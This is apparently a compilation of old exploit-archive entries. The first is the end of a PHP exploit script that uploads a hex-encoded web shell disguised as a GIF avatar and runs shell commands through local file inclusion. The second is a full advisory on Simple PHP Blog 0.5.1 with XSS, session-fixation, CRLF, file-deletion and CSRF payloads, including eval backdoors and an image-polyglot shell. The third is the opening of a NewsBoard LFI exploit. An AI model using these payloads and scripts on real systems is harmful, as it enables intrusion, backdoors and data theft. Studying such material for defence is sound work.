$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
}
function make_seed()
{
list($usec, $sec) = explode(' ', microtime());
return (float) $sec + ((float) $usec * 100000);
}
$host=$argv[1];
$path=$argv[2];
$username=$argv[3];
$password=$argv[4];
$user_id=$argv[5];
$cmd="";
$port=80;
$proxy="";
for ($i=6; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
echo "please wait...\n";
$data.='-----------------------------7d6224c08dc
Content-Disposition: form-data; name="username"
'.$username.'
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="password"
'.$password.'
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="submit"
Login
-----------------------------7d6224c08dc--
';
echo "login...\n";
$packet ="POST ".$p."login.php?page_id=3 HTTP/1.0\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d6224c08dc\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
sleep(1);
$hauru=
"\x20\x0d\x0a\x47\x49\x46\x38\x36\x0d\x0a\x3c\x3f\x70\x68\x70\x20".
"\x6f\x62\x5f\x63\x6c\x65\x61\x6e\x28\x29\x3b\x0d\x0a\x2f\x2f\x52".
"\x75\x63\x68\x6f\x6d\x79\x20\x7a\x61\x6d\x65\x6b\x20\x48\x61\x75".
"\x72\x75\x20\x3b\x2d\x29\x0d\x0a\x65\x63\x68\x6f\x22\x2e\x2e\x2e".
"\x48\x61\x63\x6b\x65\x72\x2e\x2e\x4b\x61\x63\x70\x65\x72\x2e\x2e".
"\x4d\x61\x64\x65\x2e\x2e\x69\x6e\x2e\x2e\x50\x6f\x6c\x61\x6e\x64".
"\x21\x21\x2e\x2e\x2e\x44\x45\x56\x49\x4c\x2e\x54\x45\x41\x4d\x2e".
"\x2e\x74\x68\x65\x2e\x2e\x62\x65\x73\x74\x2e\x2e\x70\x6f\x6c\x69".
"\x73\x68\x2e\x2e\x74\x65\x61\x6d\x2e\x2e\x47\x72\x65\x65\x74\x7a".
"\x2e\x2e\x2e\x22\x3b\x0d\x0a\x20\x0d\x0a\x20\x0d\x0a\x65\x63\x68".
"\x6f\x22\x2e\x2e\x2e\x47\x6f\x20\x54\x6f\x20\x44\x45\x56\x49\x4c".
"\x20\x54\x45\x41\x4d\x20\x49\x52\x43\x3a\x20\x37\x32\x2e\x32\x30".
"\x2e\x31\x38\x2e\x36\x3a\x36\x36\x36\x37\x20\x23\x64\x65\x76\x69".
"\x6c\x74\x65\x61\x6d\x22\x3b\x0d\x0a\x20\x0d\x0a\x20\x0d\x0a\x65".
"\x63\x68\x6f\x22\x2e\x2e\x2e\x44\x45\x56\x49\x4c\x20\x54\x45\x41".
"\x4d\x20\x53\x49\x54\x45\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\x77".
"\x77\x77\x2e\x72\x61\x68\x69\x6d\x2e\x77\x65\x62\x64\x2e\x70\x6c".
"\x2f\x22\x3b\x0d\x0a\x20\x0d\x0a\x20\x0d\x0a\x69\x6e\x69\x5f\x73".
"\x65\x74\x28\x22\x6d\x61\x78\x5f\x65\x78\x65\x63\x75\x74\x69\x6f".
"\x6e\x5f\x74\x69\x6d\x65\x22\x2c\x30\x29\x3b\x0d\x0a\x20\x0d\x0a".
"\x20\x0d\x0a\x65\x63\x68\x6f\x20\x22\x48\x61\x75\x72\x75\x22\x3b".
"\x0d\x0a\x20\x0d\x0a\x20\x0d\x0a\x70\x61\x73\x73\x74\x68\x72\x75".
"\x28\x24\x5f\x53\x45\x52\x56\x45\x52\x5b\x48\x54\x54\x50\x5f\x48".
"\x41\x55\x52\x55\x5d\x29\x3b\x0d\x0a\x20\x0d\x0a\x20\x0d\x0a\x64".
"\x69\x65\x3b\x3f\x3e\x0d\x0a\x20";
$data.='-----------------------------7d6224c08dc
Content-Disposition: form-data; name="use_avatar"
1
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="avatar"; filename="hauru.gif"
Content-Type: text/plain
'.$hauru.'
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="submit"
Einstellungen Speichern
-----------------------------7d6224c08dc--
';
echo "upload hauru...\n";
$packet ="POST ".$p."index.php?content=usercp&action=avatar HTTP/1.0\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d6224c08dc\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
sleep(1);
echo "Hauru uploaded!! now remote code execution...\n";
$packet ="GET ".$p."acp.php?content=../images/avatars/".$user_id.".gif%00 HTTP/1.1\r\n";
$packet.="HAURU: ".$cmd."\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (strstr($html,"Hauru"))
{
$temp=explode("Hauru",$html);
die($temp[1]);
}
echo "Exploit err0r :(";
echo "Go to DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam";
?>
# milw0rm.com [2006-11-01]
DarkFig/sphpblog051-multi.txt ( na)
Title: Simple PHP Blog (sphpblog) <= 0.5.1 Multiple Vulnerabilities
Vendor: http://sourceforge.net/projects/sphpblog/
Advisory: http://acid-root.new.fr/?0:15
Author: DarkFig < gmdarkfig (at) gmail (dot) com >
Released on: 2007/10/21
Changelog: ----------
L M H T
Summary: Ip Spoofing [X] [_] [_] [X]
Cross Site Scripting [X] [_] [_] [X]
Session Fixation [X] [_] [_] [X]
mail() CRLF Injection [X] [_] [_] [_]
Local File Inclusion (+CSRF) [_] [X] [_] [X]
File Deletion (+CSRF) [_] [X] [_] [X]
File Upload Vulnerability [_] [_] [X] [X]
Code Execution (+CSRF) [_] [_] [X] [X]
Legend: L - Low risk M - Medium risk
H - High risk T - Tested
Risk level: Medium / High
CVE: ----------
I - IP SPOOFING
The file "scripts/sb_communicate.php" contains the following
code:
19| function getIP() {
20| if ( !empty ( $_SERVER[ 'HTTP_CLIENT_IP' ] ) ) {
21| $ip = $_SERVER[ 'HTTP_CLIENT_IP' ];
22| }
23| else if ( !empty ( $_SERVER[ 'HTTP_X_FORWARDED_FOR' ] ) ) {
24| $ip = $_SERVER[ 'HTTP_X_FORWARDED_FOR' ];
25| }
26| else if ( !empty ( $_SERVER[ 'REMOTE_ADDR' ] ) ) {
27| $ip = $_SERVER[ 'REMOTE_ADDR' ];
28| }
29| else if ( getenv( "HTTP_CLIENT_IP" ) ) {
30| $ip = getenv( "HTTP_CLIENT_IP" );
31| }
32| else if ( getenv( "HTTP_X_FORWARDED_FOR" ) ) {
33| $ip = getenv( "HTTP_X_FORWARDED_FOR" );
34| }
35| else if ( getenv( "REMOTE_ADDR") ) {
36| $ip = getenv( "REMOTE_ADDR" );
37| }
38| else {
39| $ip = "UNKNOWN";
40| }
41| return( $ip );
42| }
So, an attacker can spoof his IP, he just have to create
an HTTP packet, add a special header, and send it. The
HTTP packet will look's like this:
GET /index.php HTTP/1.1\r\n
Host: localhost\r\n
X-Forwarded-For: 127.0.0.1\r\n
Connection: keep-alive\r\n\r\n
Later, we'll see how to gain the administrator's session
id. Even if we got the good session id, there is a
protection that "normally" don't permit to be logged in.
Let's see a part of the file "scripts/sb_login.php":
28| // Check if user is logged in.
29| if ( isset( $_SESSION[ 'logged_in' ] ) &&
| $_SESSION[ 'logged_in' ] == 'yes' ) {
|
30| if ( $_SESSION[ 'site_path' ] ===
| dirname($_SERVER[ 'PHP_SELF' ]) ) {
|
31| if ( $_SESSION[ 'ip' ] === getIP() ) {
32| // User is logged in.
33| return ( true );
34| }
35| }
36| }
Thanks to the getIP() function, if we know the
administrator's IP (later we'll see how to get it easily),
we can bypass the third condition.
II - CROSS SITE SCRIPTING
When a guest add a comment, an HTTP packet is sent to
"comment_add_cgi.php". Before writing the comment into
a file, there is some conditions, the first condition is
that the IP sent with the POST method, must be the same
as the IP returned by the getIP() function. Let's see
the code:
88| if ($ok) {
89| // Verify that posted IP and actual IP matches.
90| if ( getIP() === $_POST['user_ip'] ) {
91| $ipMatches = true;
92| } else {
93| $ipMatches = false;
94| $ok = false;
95| $error_message = $lang_string[ 'error_no_match' ];
96| }
97| }
This is useless, I don't know what the author wanted to
do but this can be bypassed easily. After some conditions,
the write_comment() function is called:
219| $result = write_comment( $_POST[ 'y' ], $_POST[ 'm' ],
| $_POST[ 'entry' ],
220| $comment_name,
221| $comment_email,
222| $comment_url,
223| $comment_text,
224| $_POST[ 'user_ip' ],
225| $moderationFlag,
226| time() );
This function is situated in "scripts/sb_comments.php".
Let's see the data which will be stored in a file:
519| // Save the file
520| $save_data = array();
521| $save_data[ 'VERSION' ] = $sb_info[ 'version' ];
522| $save_data[ 'NAME' ] = clean_post_text( $comment_name );
523| $save_data[ 'DATE' ] = $comment_date;
524| $save_data[ 'CONTENT' ] = sb_parse_url( clean_post_text( $comment_text ) );
|
525| if ( $comment_email != '' ) {
526| $save_data[ 'EMAIL' ] = clean_post_text( $comment_email );
527| }
|
528| if ( $comment_url != '' ) {
529| $save_data[ 'URL' ] = clean_post_text( $comment_url );
530| }
|
531| $save_data[ 'IP-ADDRESS' ] = $user_ip; // New 0.4.8
532| $save_data[ 'MODERATIONFLAG' ] = $hold_flag;
533|
534| // Implode the array
535| $str = implode_with_keys( $save_data );
536|
537| // Save the file
538| $result = sb_write_file( $entryFile, $str );
The clean_post_text() function protect against XSS, it
also replace a string separator (by its html equivalent)
which is used when comment's data are extracted.
This function is in the file "scripts/sb_formatting.php":
13| function clean_post_text( $str ) {
14| // Cleans post text input.
15| //
16| // Strip out and replace pipes with colons. HTML-ize entities.
17| // Use charset from the language file to make sure we're only
18| // encoding stuff that needs to be encoded.
19| //
20| // This makes entries safe for saving to a file (since the data
21| // format is pipe delimited.)
22| global $lang_string;
23| $str = str_replace( '|', '|', $str );
24| $str = @htmlspecialchars( $str, ENT_QUOTES, $lang_string[ 'php_charset' ] );
25|
26| return ( $str );
27| }
The clean_post_text() function isn't applied to the
IP address which will be stored in the file. So this
can be exploited to conduct XSS attack. The attacker
will send an HTTP packet like this one:
POST /comment_add_cgi.php HTTP/1.1\r\n
Host: localhost\r\n
Client-IP: <script>alert(666)</script>\r\n
Connection: keep-alive\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Content-Length: 229\r\n\r\n
y=07&m=07&entry=entry070727-161718&comment_name=HereMyName
&comment_email=&comment_url=&user_ip=<script>alert(666)</script>
&style_dropdown=--&comment_text=This+is+an+example+comment.
&comment_capcha=571560&submit=%A0Post+Comment%A0\r\n\r\n
The sender IP address can be only seen by a registered
user. So the code sent by the attacker will be executed
when a registered user will see the comments page.
III - SESSION FIXATION
In a session fixation attack, the attacker have to set
the victim's session id. In our case, the attacker fix
the user's session id, the victim which is logged in,
will get logged out when the cookie will be set, then
if the victim try to log in, the session id will be
registered on the server. Let's see a part of the
logged_in() function:
11| function logged_in ( $redirect_to_login, $redirect_to_setup ) {
12|
13| // Turn off URL SIDs.
14| ini_set('url_rewriter.tags','');
15| ini_set('session.use_trans_sid', false);
16|
17| // Init the session.
18| session_set_cookie_params(60*60*24*5);
19|
20| // Check if the user has a client-side cookie.
21| if ( isset( $_COOKIE[ 'sid' ] ) ) {
22| session_id($_COOKIE[ 'sid' ]);
23| }
24|
25| // Start the session.
26| session_start ();
27|
28| // Check if user is logged in.
29| if ( isset( $_SESSION[ 'logged_in' ] ) &&
| $_SESSION[ 'logged_in' ] == 'yes' ) {
|
30| if ( $_SESSION[ 'site_path' ] ===
| dirname($_SERVER[ 'PHP_SELF' ]) ) {
|
31| if ( $_SESSION[ 'ip' ] === getIP() ) {
32| // User is logged in.
33| return ( true );
34| }
35| }
36| }
After, the attacker, who knows the session id, just
have to use it to be logged in as the victim's account.
But in our case, he must also know the victim's IP.
I'll demonstrate how to get administrator rights even
if the victim has a protection against XSS (NoScript
Firefox plugin for example). First, the attacker will
fix the victim's session id by setting a cookie to
the victim. Then he'll also force the victim's web
browser to establish a connexion to a script that
will get the victim's IP. Take a look at this schema:
+----------------------------------------------------------+
| The attacker post a comment using the XSS vulnerability. |
| The code which will be executed on the client browser |
| will set the "sid" cookie, it will also force the |
| victim's web browser to send an HTTP packet to a script |
| that will mail the victim's IP to the attacker. |
+----------------------------------------------------------+
|
| +---------------------------------------------------+
+--> | <meta http-equiv=Set-Cookie content=sid=MD5HERE;> |
| <img src=http://attacker.com/getip_and_mail.php> |
+---------------------------------------------------+
|
+-------------------------------------------------+ |
| The victim, which is logged in, have to see the | <--+
| comments page. After saw it, the victim will be |
| logged out. |
+-------------------------------------------------+
|
| +------------------------------------------+
+--> | The victim try to log in. Now that she's |
| logged in, the session id set by the |
| attacker is registered on the server. |
+------------------------------------------+
|
+--------------------------------------------+ |
| Now the attacker just have to send an HTTP |<--+
| packet which contains the session id and a |
| special header with the victim's IP. |
| The attacker is logged in as the victim's |
| account. |
+--------------------------------------------+
As you can see, even if the victim is protected against
XSS, it's always possible to get adminitrator rights with
this type of attack, we juste use the "meta" and "img" tags.
IV - MAIL() CRLF INJECTION
User's variables are not checked before be used in the mail()
function. The file "comment_add_cgi.php" call the
write_comment() function with the following parameters:
214| $comment_name = sb_stripslashes($_POST['comment_name']);
215| $comment_email = sb_stripslashes($_POST['comment_email']);
216| $comment_url = sb_stripslashes($_POST['comment_url']);
217| $comment_text = sb_stripslashes($_POST['comment_text']);
218|
219| $result = write_comment($_POST[ 'y' ],$_POST[ 'm' ],
| $_POST['entry' ],
220| $comment_name,
221| $comment_email,
222| $comment_url,
223| $comment_text,
224| $_POST[ 'user_ip' ],
225| $moderationFlag,
226| time() );
Then the function clean_post_text() is applied to $comment_email.
But this function doesn't protect against CRLF Injection, this
will not replace the \r and \n chars. Take a look at the file
"sb_comments.php":
471| function write_comment($y,$m,$entry,$comment_name,$comment_email
|
525| if ( $comment_email != '' ) {
526| $save_data[ 'EMAIL' ] = clean_post_text( $comment_email );
527| }
|
584| // Send the Email
585| if ( array_key_exists( 'EMAIL', $save_data ) ) {
586| sb_mail( $save_data[ 'EMAIL' ], $blog_config[ 'blog_email' ],
| $subject, $body, false );
587| }
The goal of the sb_mail() function is to send mass emails.
As you can see belows, there is no protection against
$save_data[ 'EMAIL' ].
45| function sb_mail ($from, $to, $subject, $body, $text=true, $priority=3) {
|
69| $headers .= 'From: ' . $from . " \r\n";
70| $headers .= 'Reply-To: ' . $from . " \r\n";
71| $headers .= 'Return-Path: ' . $from . " \r\n";
|
76| ini_set('sendmail_from', $from);
77| for ( $j=0; $j < count($to_array); $j++ ) {
78| $result = mail( $to_array[$j], sb_stripslashes($subject),
| sb_stripslashes($body), $headers );
79| }
80| ini_restore('sendmail_from');
So an attacker can perform a CRLF injection attack into the mail()
function, it will probably be used by spammers.
V - LOCAL FILE INCLUSION (+CSRF)
There is an LFI vulnerability (admin rights needed)
in the file "languages_cgi.php":
76| if ( array_key_exists( 'store_data', $_GET ) ) {
77|
78| // Store all the data from language 2
79| require_once('languages/' . $_GET[ 'lang2' ] . '/strings.php');
This will require magic_quotes_gpc=Off. Because they use the
GET method, there's a CSRF vulnerability too. For each new
comments, a new text file is created. The structure of the file
like this:
VERSION|0.4.8
|NAME|<my_name>
|DATE|1188078694
|CONTENT|<my_comment>
|EMAIL|<my_email>
|IP-ADDRESS|<my_ip_or_xss>
|MODERATIONFLAG|H
Now imagine that an attacker use the XSS vulnerability to post
php code and html tags which will make the admin sent an HTTP
request to exploit the LFI vuln. The XSS code will look's like
this:
<!--- <?php
$handle = fopen('./themes/back.php', 'w+');
fwrite($handle, '<?php @eval($_SERVER[HTTP_SHELL]); ?>');
fclose($handle);
mail('hacker@you.com', 'hey', 'code executed');
exit();
/* --->
<img src=http://<site>/languages_cgi.php?store_data=1&lang2=
../content/07/07/entry070727-161718/comments/comment070825-235134.txt%00>
<!--- */
?> --->
In order to exploit this, the attacker must know where the new
file will be created. Let's see the code:
471| function write_comment ( $y, $m, $entry, $comment_name,
| $comment_email, $comment_url, $comment_text, $user_ip,
| $hold_flag='', $comment_date=null ) {
|
478| $basedir = 'content/';
479| $dir = $basedir.$y.'/'.$m.'/'.$entry;
|
494| $dir .= '/comments';
|
506| $dir .= '/';
|
512| $stamp = date('ymd-His');
513| if ( $blog_config[ 'blog_enable_gzip_txt' ] ) {
514| $entryFile = $dir.'comment'.$stamp.'.txt.gz';
515| } else {
516| $entryFile = $dir.'comment'.$stamp.'.txt';
517| }
The variables $y, $m and $entry are sent with the HTTP request.
The filename is decided with the date() function. There is many
ways for know the content returned by $stamp:
- Ask the server by sending an HTTP request (the "Date" header).
- Bruteforce the path (Add several html tags).
- Divide our attack in two parts (filenames are displayed in the html source).
The attacker must also urlencode the content of his XSS, the
HTTP packet will finally look's like this:
POST /comment_add_cgi.php HTTP/1.1
Host: localhost
Connection: keep-alive
Cookie: PHPSESSID=<SID>
Client-IP: <HTML_AND_PHP_CONTENT>
Content-Type: application/x-www-form-urlencoded
Content-Length: <LEN>
y=<Y>&m=<M>&entry=<ENTRY>&comment_name=Hacker
&comment_email=my%40you.com&comment_url=&user_ip=
<HTML_AND_PHP_CONTENT_URLENCODED>
&style_dropdown=--&comment_text=Hello&comment_capcha
=128619&submit=%A0Post+Comment%A0
Now the attacker have to wait until the admin see his comment.
VI - FILE DELETION (+CSRF)
There is a CSRF vulnerability which can lead to file
deletion. Let's see the code of "trackback_delete_cgi.php":
22| if ( array_key_exists( 'trackback', $_GET ) ) {
23| $ok = delete_trackback( $_GET[ 'trackback' ] );
24| }
So if the variable "trackback" is set with the GET method,
the delete_trackback() function is called. The code of
this function is situated in "sb_trackback.php":
229| function delete_trackback ( $entryFile ) {
230| // Delete the old file
231| if ( file_exists( $entryFile ) ) {
232| $ok = sb_delete_file( $entryFile );
233| }
If the file exists, the function sb_delete_file() is called,
with the parameter $_GET['trackback']. The source code
of this function is situated in the file "sb_fileio.php":
171| function sb_delete_file ( $filename ) {
|
175| clearstatcache();
176| if ( file_exists( $filename ) ) {
177| $result = @unlink( $filename );
178| }
There is no verification before deleting the file. So we
can delete any files on the server. The HTTP packet sent
by the attacker will look's like this:
GET /trackback_delete_cgi.php?trackback=<FILE> HTTP/1.1\r\n
Host: localhost\r\n
Connection: keep-alive\r\n\r\n
Admin right's are needed to delete files, but because
it's also a CRLF vulnerability, we can use it in our XSS,
then so admin right's aren't needed for the attacker.
VII - FILE UPLOAD VULNERABILITY
When we're admin, we can upload emoticons.
Let'see the content of the function upload_emoticons()
which is situated in the file "emoticons.php":
36| function upload_emoticons() {
37| // Emoticon upload form results
38| $path = 'images/emoticons';
39| $uploaddir = $path;
40|
41| $ok = false;
42| if ( $_FILES[ 'user_emot' ][ 'error' ] == 0 ) {
43| if (!file_exists($uploaddir)) {
44| $oldumask = umask(0);
45| @mkdir($uploaddir, 0777 );
46| @umask($oldumask);
47| }
48|
49| $uploaddir .= '/';
50| $uploadfile = $uploaddir.
| preg_replace("/ /","_",$_FILES[ 'user_emot' ][ 'name' ]);
51|
52| if (@is_uploaded_file($_FILES['user_emot']['tmp_name'])) {
|
53| if (@getimagesize($_FILES['user_emot']['tmp_name']) == FALSE){
54| $ok = -1;
|
55| } else {
|
56| if (@move_uploaded_file($_FILES['user_emot']['tmp_name'], $uploadfile)){
57| chmod( $uploadfile, 0777 );
58| $ok = true;
59| }
As you can see, there is only one protection against file
upload vulnerability. The function getimagesize() will
return FALSE if the upload file isn't a valid image file.
But we can bypass this easily. Take a look at this:
C:\>edjpgcom img1x1.jpg
C:\>hexdump img1x1.jpg
ff d8 ff e0 00 10 4a 46 - 49 46 00 01 01 01 00 60 ......JF IF......
00 60 00 00 ff db 00 43 - 00 08 06 06 07 06 05 08 .......C ........
07 07 07 09 09 08 0a 0c - 14 0d 0c 0b 0b 0c 19 12 ........ ........
13 0f 14 1d 1a 1f 1e 1d - 1a 1c 1c 20 24 2e 27 20 ........ ........
22 2c 23 1c 1c 28 37 29 - 2c 30 31 34 34 34 1f 27 ......7. .01444..
39 3d 38 32 3c 2e 33 34 - 32 ff db 00 43 01 09 09 9.82..34 2...C...
09 0c 0b 0c 18 0d 0d 18 - 32 21 1c 21 32 32 32 32 ........ 2...2222
32 32 32 32 32 32 32 32 - 32 32 32 32 32 32 32 32 22222222 22222222
32 32 32 32 32 32 32 32 - 32 32 32 32 32 32 32 32 22222222 22222222
32 32 32 32 32 32 32 32 - 32 32 32 32 32 32 ff fe 22222222 222222..
00 26 3c 3f 70 68 70 20 - 65 76 61 6c 28 24 5f 53 ....php. eval...S
45 52 56 45 52 5b 48 54 - 54 50 5f 53 48 45 4c 4c ERVER.HT TP.SHELL
5d 29 3b 20 3f 3e ff c0 - 00 11 08 00 01 00 01 03 ........ ........
01 22 00 02 11 01 03 11 - 01 ff c4 00 1f 00 00 01 ........ ........
05 01 01 01 01 01 01 00 - 00 00 00 00 00 00 00 01 ........ ........
02 03 04 05 06 07 08 09 - 0a 0b ff c4 00 b5 10 00 ........ ........
02 01 03 03 02 04 03 05 - 05 04 04 00 00 01 7d 01 ........ ........
02 03 00 04 11 05 12 21 - 31 41 06 13 51 61 07 22 ........ 1A..Qa..
71 14 32 81 91 a1 08 23 - 42 b1 c1 15 52 d1 f0 24 q.2..... B...R...
33 62 72 82 09 0a 16 17 - 18 19 1a 25 26 27 28 29 3br..... ........
2a 34 35 36 37 38 39 3a - 43 44 45 46 47 48 49 4a .456789. CDEFGHIJ
53 54 55 56 57 58 59 5a - 63 64 65 66 67 68 69 6a STUVWXYZ cdefghij
73 74 75 76 77 78 79 7a - 83 84 85 86 87 88 89 8a stuvwxyz ........
92 93 94 95 96 97 98 99 - 9a a2 a3 a4 a5 a6 a7 a8 ........ ........
a9 aa b2 b3 b4 b5 b6 b7 - b8 b9 ba c2 c3 c4 c5 c6 ........ ........
c7 c8 c9 ca d2 d3 d4 d5 - d6 d7 d8 d9 da e1 e2 e3 ........ ........
e4 e5 e6 e7 e8 e9 ea f1 - f2 f3 f4 f5 f6 f7 f8 f9 ........ ........
fa ff c4 00 1f 01 00 03 - 01 01 01 01 01 01 01 01 ........ ........
01 00 00 00 00 00 00 01 - 02 03 04 05 06 07 08 09 ........ ........
0a 0b ff c4 00 b5 11 00 - 02 01 02 04 04 03 04 07 ........ ........
05 04 04 00 01 02 77 00 - 01 02 03 11 04 05 21 31 ......w. .......1
06 12 41 51 07 61 71 13 - 22 32 81 08 14 42 91 a1 ..AQ.aq. .2...B..
b1 c1 09 23 33 52 f0 15 - 62 72 d1 0a 16 24 34 e1 ....3R.. br....4.
25 f1 17 18 19 1a 26 27 - 28 29 2a 35 36 37 38 39 ........ ...56789
3a 43 44 45 46 47 48 49 - 4a 53 54 55 56 57 58 59 .CDEFGHI JSTUVWXY
5a 63 64 65 66 67 68 69 - 6a 73 74 75 76 77 78 79 Zcdefghi jstuvwxy
7a 82 83 84 85 86 87 88 - 89 8a 92 93 94 95 96 97 z....... ........
98 99 9a a2 a3 a4 a5 a6 - a7 a8 a9 aa b2 b3 b4 b5 ........ ........
b6 b7 b8 b9 ba c2 c3 c4 - c5 c6 c7 c8 c9 ca d2 d3 ........ ........
d4 d5 d6 d7 d8 d9 da e2 - e3 e4 e5 e6 e7 e8 e9 ea ........ ........
f2 f3 f4 f5 f6 f7 f8 f9 - fa ff da 00 0c 03 01 00 ........ ........
02 11 03 11 00 3f 00 f7 - fa 28 a2 80 3f ff d9 d9 ........ ........
C:\>ren img1x1.jpg backdoor.php
The created file is a valid jpg image, so the check made
by the function getimagesize() will be bypassed. And so
the backdoor will be uploaded in "images/emoticons".
VIII - CODE EXECUTION (+CSRF)
There is a CSRF vulnerability which can lead to execute
PHP code, this is the critical point of this script.
Let's see the code of the file "manage_users.php":
61| if ( $_GET[ 'action' ] == "update" ) {
|
63| if ($_SESSION[ 'fulladmin' ] != 'yes' ) {
64| echo($lang_string['fulladminerror']);
65| } else {
66|
67| // First read and remove the offending line
68| $pfile = fopen("config/users.php","a+");
69| rewind($pfile);
|
70| while (!feof($pfile)) {
71| $line = fgets($pfile);
72| $tmp = explode('|', $line);
73|
74| if ( $_GET[ 'type' ] == "edit" ) {
75| if ( $tmp[1] != $_GET[ 'user' ] )
| { $newfile = $newfile . $line; }
76| } else {
77| $newfile = $newfile . $line;
78| }
79| }
80| fclose($pfile);
|
101| $blankfield = "";
102|
103| // Create the record structure
104| if ( $_GET[ 'type' ] == "edit" ) {
|
107| $password = $_GET[ 'oldpasshash' ];
108| if ( $password != $_POST[ 'sPassword' ] ) {
109| $password = crypt($_GET[ 'user' ],$_POST[ 'sPassword' ] );
110| }
111|
112| $array =
| array($_POST[ 'sFullname' ], $_GET[ 'user' ], $password,
| $_POST[ 'sAvatar' ], $active, $_POST[ 'sEmail' ],
| $modcomments, $deleteentries, $editany, $blankfield);
|
113| } else {
|
114| $array =
| array($_POST[ 'sFullname' ], $_POST[ 'sUsername' ],
| crypt( $_POST[ 'sUsername' ], $_POST[ 'sPassword' ] ),
| $_POST[ 'sAvatar' ], $active, $_POST[ 'sEmail' ],
| $modcomments, $deleteentries, $editany, $blankfield);
115| }
|
116| $str = implode('|', $array);
117| $newfile = $newfile . $str . "n";
|
120| $pfile = fopen("config/users.php","w");
121| fwrite($pfile, $newfile);
122| fclose($pfile);
123|
124| redirect_to_url("manage_users.php");
125| }
126| }
As you can see there is no protection against PHP chars
(like strip_tags()) before inserting user's data into
the php file. But the author of the script add a ".htaccess"
file in the "config" directory. Let's see the content of
this file:
1| IndexIgnore *
2|
3| <Files .htaccess>
4| order allow,deny
5| deny from all
6| </Files>
7|
8| <Files *.txt>
9| order allow,deny
10| deny from all
11| </Files>
So we can't list the content of the directory, and we
don't have access to .htaccess/.txt files. But we can
access to .php files ! This require admin rights...
but we can write PHP code with the GET method, that's
why there's also a CSRF vulnerability. In our example
we will take this php code (as you can see we don't
need magic_quote_gpc=Off):
1| <?php
2|
3| if(isset($_GET[mail]))
4| {
5| $mail = <<<MAIL
6| hacker@you.com
7| MAIL;
8|
9| $subject = <<<SUBJ
10| Hey !
11| SUBJ;
12|
13| $body = <<<BODY
14| Code executed
15| BODY;
16|
17| mail($mail,$subject,$body);
18| }
19| else eval($_SERVER[HTTP_SHELL]);
20|
21| ?>
So the attacker just have to post (using the XSS)
something like this:
<img src=http://<site>/manage_users.php?action=update
&type=edit&user=%3C%3Fphp%0D%0A%0D%0Aif%28isset%28%24
_GET%5Bmail%5D%29%29%0D%0A%7B%0D%0A%24mail+%3D+%3C%3C
%3CMAIL%0D%0Ahacker%40you.com%0D%0AMAIL%3B%0D%0A%0D%0
A%24subject+%3D+%3C%3C%3CSUBJ%0D%0AHey+%21%0D%0ASUBJ%
3B%0D%0A%0D%0A%24body+%3D+%3C%3C%3CBODY%0D%0ACode+exe
cuted%0D%0ABODY%3B%0D%0A%0D%0Amail%28%24mail%2C%24sub
ject%2C%24body%29%3B%0D%0A%7D%0D%0Aelse+eval%28%24_SE
RVER%5BHTTP_SHELL%5D%29%3B%0D%0A%0D%0A%3F%3E>
<!--- Write php code --->
<img src=http://<site>/config/users.php?mail=1>
<!--- mail the attacker --->
<img src=http://<site>/trackback_delete_cgi.php?track
back=MY_COMMENT_FILENAME>
<!--- delete the comment --->
After, he have to wait until the admin see his comment.
Then the HTTP request will be sent to the script, and
so the PHP code will be written into "config/users.php".
IX - END
As you can see there's some pretty cool things here:
- [III] We bypass Noscript firefox plugin protection.
We don't use any <script> tags.
- [V] We use a "self inclusion" technique.
We use html and php commentary tags which are very
useful in our case.
I didn't contacted the author of the script, but if
he keeps himself informed of updates concerning his
script, he should correct these vulnerabilities as
quickly as possible.
//Greetz: ddx39, berga, wo, overlock[]
Simple PHP Blog versions 0.5.1 and below suffer from multiple vulnerabilities including cross site scripting, local file inclusion, and code execution flaws.
rgod/Unclassified NewsBoard <= 1.6.1 patch 1 Arbitrary Local Inclusion Exploit ( php)
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "Unclassified NewsBoard <= 1.6.1 patch 1 ABBC[Config][smileset] arbitrary\r\n";
echo "local inclusion\r\n";
echo "by rgod rgod@autistici.org\r\n";
echo "site: http://retrogod.altervista.org\r\n\r\n";
echo "works with register_globals = On & magic_quotes_gpc = Off\r\n\r\n";
/*
1.5.3 patch level 4 and below, exploit is a bit different, ex:
http://[target]/[path]/bb_lib/abbc.css.php?design_path=../../../../../../../../../etc/passwd%00
*/
if ($argc<6) {
echo "Usage: php ".$argv[0]." host path user pass cmd OPTIONS\r\n";
echo "host: target server (ip/hostname)\r\n";
echo "path: path to UNB\r\n";
echo "cmd: a shell command\r\n";
echo "user/pass: you need a valid user account to upload files\r\n";
echo "Options:\r\n";
echo " -p[port]: specify a port other than 80\r\n";
echo " -P[ip:port]: specify a proxy\r\n";
echo "Examples:\r\n";
echo "php ".$argv[0]." localhost /unb/ your_username password cat ./../board.conf.php\r\n";
